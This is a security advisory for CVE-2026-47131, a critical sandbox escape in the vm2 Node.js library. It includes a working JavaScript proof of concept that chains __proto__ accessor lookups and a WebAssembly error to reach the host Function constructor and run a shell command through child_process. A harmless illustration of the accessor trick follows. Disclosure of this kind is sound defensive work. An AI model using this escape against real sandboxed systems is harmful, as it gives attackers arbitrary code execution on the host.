CVE-2026-47131

CRITICAL 10.0

vm2 has a Sandbox Escape issue

Published: 5/29/2026
Modified: 5/29/2026

Description

### Summary

By combining `Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__")`, `Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__")`, and Node.js's `ERR_INVALID_ARG_TYPE` Error, the host's `TypeError` constructor can be obtained, which allows the escape from the sandbox. This allows attackers to run arbitrary code.

### PoC

```js
"use strict";

const { VM } = require("vm2");
const vm = new VM();

vm.run(`
    "use strict";
    const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__");
    const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__");
    async function f() {
        try {
            await WebAssembly.compileStreaming();
        } catch(e) {
            setProto.call(getProto.call(e), null);
        }
        try {
            await WebAssembly.compileStreaming();
        } catch(e) {
            const HostFunction = e.constructor.constructor;
            new HostFunction("return process")().mainModule.require("child_process").execSync("echo pwned", { stdio: "inherit" });
        }
    }
    f();
`);
```

### Impact

Sandbox Escape → RCE
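What the two accessor expressions in the PoC evaluate to, and what `setProto.call(getProto.call(e), null)` does to an error object, shown in plain Node.js without vm2. This is an added illustration, not part of the advisory or of vm2; `DemoError` and the function names are constructed for the example.

```javascript
// Added illustration: plain Node.js, no vm2 involved.

// Buffer.call is Function.prototype.call, so Buffer.call.call(fn, thisArg, arg)
// is fn.call(thisArg, arg): the legacy lookup helpers run with `this` = Buffer
// and walk its prototype chain for an accessor named "__proto__".
function pocAccessors() {
  const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__");
  const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__");
  return { getProto, setProto };
}

// The results are the getter/setter pair of Object.prototype.__proto__.
function matchesObjectPrototypeAccessor() {
  const { getProto, setProto } = pocAccessors();
  const desc = Object.getOwnPropertyDescriptor(Object.prototype, "__proto__");
  return getProto === desc.get && setProto === desc.set;
}

// Effect of `setProto.call(getProto.call(e), null)` on an error object,
// applied to a constructed stand-in class so built-in errors stay untouched.
function detachPrototype() {
  const { getProto, setProto } = pocAccessors();
  class DemoError extends Error {}
  const e = new DemoError("demo");
  const before = e instanceof Error;
  setProto.call(getProto.call(e), null); // DemoError.prototype now inherits from null
  return {
    before,
    after: e instanceof Error,
    stillDemo: e instanceof DemoError,
    protoOfProto: Object.getPrototypeOf(DemoError.prototype),
    // A raw (unwrapped) error object leads to the Function constructor of its realm.
    reachesFunction: e.constructor.constructor === Function,
  };
}

console.log(matchesObjectPrototypeAccessor(), detachPrototype());
```

The `reachesFunction` field shows why the summary treats obtaining a host error constructor as the escape itself: `e.constructor.constructor` on an unwrapped error is that realm's `Function`.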

Affected packages (1)

CVSS scores

| Source | Version | Severity | Vector |
| --- | --- | --- | --- |
| osv | CVSS 3.1 | CRITICAL 10.0 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |

References (4)